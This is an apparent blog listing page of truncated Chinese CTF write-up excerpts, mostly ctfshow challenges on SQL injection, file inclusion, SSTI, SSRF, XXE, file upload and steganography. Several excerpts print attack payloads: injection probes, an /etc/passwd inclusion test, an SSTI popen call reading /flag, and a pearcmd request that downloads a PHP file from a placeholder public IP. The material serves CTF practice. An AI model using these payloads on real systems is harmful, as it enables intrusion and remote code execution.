ctfshow-warmup ctfshow warmup

``` 可能的值：PATHINFO_DIRNAME - 只返回 dirnamePATHINFO_BASENAME - 只返回 basenamePATHINFO_EXTENSION - 只返回 extension| 官方wp： GET提交： ``` http://0fdf6601-a970-4a27- ......

SQL注入流程 判断注入点： ``` or 1=1--+ 'or 1=1--+ "or 1=1--+ )or 1=1--+ ')or 1=1--+ ")or 1=1--+ "))or 1=1--+ ``` 判断列数： ``` 1' order by 1 --+ 1' order by 2 --+ 1 ......

# ATTup  文件上传的点！没想法... # Misc游戏签到 ctfshow{White_give ......

# 基础知识： 文件包含分为本地包含和远程包含。 最基础的检测方式： 本地包含：?file=../../../etc/passwd 远程包含：?file=http://www.baidu.com 这两种是最基础的检测方式，用以判断是否存在文件包含漏洞。检测完成后在使用对应的利用方式进行利用。 常见的 ......

# 短标签绕过 ``` 1. 常规写法 不需要开启参数设置 2. 等价于 注： 利用短标签写法可以绕过一些对php字符的过滤 Windows环境中短标签默认是打开的，Linux下 默认是关闭的。 控制参数： php支持短标签，需要我们把short_open_tag 设置为On. 3. 注：需要配置p ......

# 关于intval() ## web89 ``` ?num[]=0x123 ``` Hint 通过数组绕过 ## web90 ``` ?num=0x117c ?num=010574 ``` ``` PHP intval() 函数 int intval ( mixed $var [, int $ba ......

sql注入题！ 注入位置是在登陆的 姓名处注入！ 题目答案：竟然不是做对题目然后出flag! ``` 1.CTF（Capture The Flag）起源于以下哪项赛事？ A A.DEFCON CTF B.CJB CTF C.XCTF D.S3C CTF 2.CTF不包含以下哪种⽐赛模式？ D A.解 ......

* misc11： 没有头绪，看了网上大佬的一些思路，受益匪浅，和大家分享下。 1.解压zip文件，用winhex打开misc11.png 2.判断文件格式是否篡改，检查png的文件头和文件尾，文件格式正常 PNG文件头(hex)：89 50 4e 47 0d 0a 1a 0a PNG文件尾(hex ......

一段.flac音频，提示隐写 下载audacity软件，打开 wp2 发现左声道是摩斯电码，这里给出一个大佬们用的摩斯电码音频解码工具 导出为MP3或者wav格式，开始解密 （使用audacity生成单声道音频）（静音+删除右耳声道+左耳导出为mp3格式） upload后play ......

右键链接另存保存图片，放入winhex 点击中显示“图像存在错误无法显示”，大概是有数据错了需要修改，导致打不开图片 查看后，参考博客，发现png文件署名域有误 改为89，保存，flag出现 ......

【隐写工具】【试一试？】jphide seek（JPHS） 使用方法,检测提示 放进JPHS，无密码seek保存为.txt格式 文件头有点像png，将后缀改为.png出现二维码，手机扫码跳转到CTFSHOW登录页面 【捂脸】看了眼wp，所以说找个QR解析工具看URL，得到： https://ctf. ......

小明的压缩包又忘记密码了？他去电脑维修店去修，人家扔出来说这个根本就没有密码，是个假密码。小明懵了，明明有密码的啊，你能帮帮小明吗？ 伪加密，放入winhex 一个 zip 文件由三个部分组成：压缩源文件数据区+压缩源文件目录区+压缩源文件目录结束标志 ......

QW8obWdIWF5FKUFSQW5URihKXWZAJmx0OzYiLg== 比base64还大的base 比base64还大的base有base85,base91,base92等 后面有两个等于号，是base64的形式 （当最后剩余两个八位(待补足)字节（2个byte）时，最后一个6位的Bas ......

图片这么好看，但是没啥用呦 图片隐写 图片隐写的解题思路汇总 解压后的word放进 010editor ......

文件的主人喜欢用生日做密码，而且还是个90后 ARCHPR ......

题目名称：我想吃培根 题目描述： -- .-. ... . ..--.- .. ... ..--.- -.-. .-.. ..--.- -... ..- - ..--.- -... .- -.-. -. ..--.- .. ... ..--.- -.-. .-.. . .-. ..--.- -- - ......

栅栏密码 密文： 53316C6B5A6A42684D3256695A44566A4E47526A4D5459774C5556375A6D49324D32566C4D4449354F4749345A6A526B4F48303D 提交格式：KEY{XXXXXXXXXXXXXX} 十六进制，想到 bas ......

* 源代码 ``` ``` * 解法 借助代码执行和字符串输出的区别进行延迟触发。 payload： http://url.challenge.ctf.show/?c=pearcmd&+download+http://公网IP/1.php 1.php： `"; ?>` 上传成功后显示： ``` do ......

小提示：需要从图片上提取flag文字，可以通过截图翻译或者微信发送图片，这两个的ai图像识别挺好用的。 misc1： 解压打开就能看见flag，提取出来就行 misc2： 记事本打开，看见 ng字符，尝试更改后缀为.png，重新打开看见flag misc3： 题目为bpg文件，使用一些看图软件可以打 ......

title: ctfshow web入门 信息搜集 date: 2023-08-11 17:21:10 categories: web刷题记录 description: web1~web17 # web1 f12查看源代码即可发现注释 # web2 js前台拦截，右键查看源代码和f12均失效,两种方 ......

title: ctfshow-web入门-sql注入-SELECT模块 date: 2023-08-13 22:06:17 categories: web刷题记录 description: web171~web172 ##基础知识缺乏的推荐看我的sqli-labs系列 ##web171 单引号包裹， ......

# ctfshow--web入门--XXE ## web373 源码 ```php loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD); //解析xml文档 $creds = simplexml_import_dom($dom); $ctfshow = ......

# ctfshow--web入门--文件上传 ## web151(前端校验) 题目中提示前端检验不可靠，应该对前端检验进行绕过  检查前端代码进 ......

## jwt介绍 对json格式的信息采取的一种编码 JWT：Json web token 由两个点分隔成三个部分，分别为: - Header - Payload - Signature： 如果在Header部分声明的签名算法为HS256，以及服务器约定使用的密钥为secret 那么签名使用的算法一 ......

# ctfshow-SSRF #### web351 flag在flag.php下，直接访问没有权限 使用curl_exec访问才有权限 > url = http://127.0.0.1/flag.php #### web352 开始上过滤了 使用`0.0.0.0`访问本机上的服务 > url = ......

# CTFSHOW-SSTI ## web361 ``` ?name={{().__class__.__base__.__subclasses__()[132].__init__.__globals__['popen']('cat /flag').read()}} ``` ## web362 ``` ......

# ctfshow--web入门--文件上传 [TOC](目录标题) ## web151(前端校验) 题目中提示前端检验不可靠，应该对前端检验进行绕过 ![在这里插入图片描述](https://img-blog.csdnimg.cn/608e51750ded43f2aefc1c2a66a3e803. ......

来源链接：https://mp.weixin.qq.com/s?__biz=MzAxOTU5NTU4MQ==&mid=2247488715&idx=1&sn=2acedd3705b27e5b9e259485f2dd9653&chksm=9bc5fc99acb2758f82b638d03ace8993 ......

# 武穆遗书 将exe文件放入exeinfo查看该执行文件被加了upx壳 ![image-20230609135243529](https://img2023.cnblogs.com/blog/2957075/202306/2957075-20230609161200627-1534549460.p ......

[HCTF 2018]WarmUp 题目来源：buuctf 题目类型：Web 设计考点：PHP代码审计、文件包含 1. 题目上来只有一张滑稽图片，查看源代码，发现有source.php文件 ![image-20230715201745123](https://images.cnblogs.com/c ......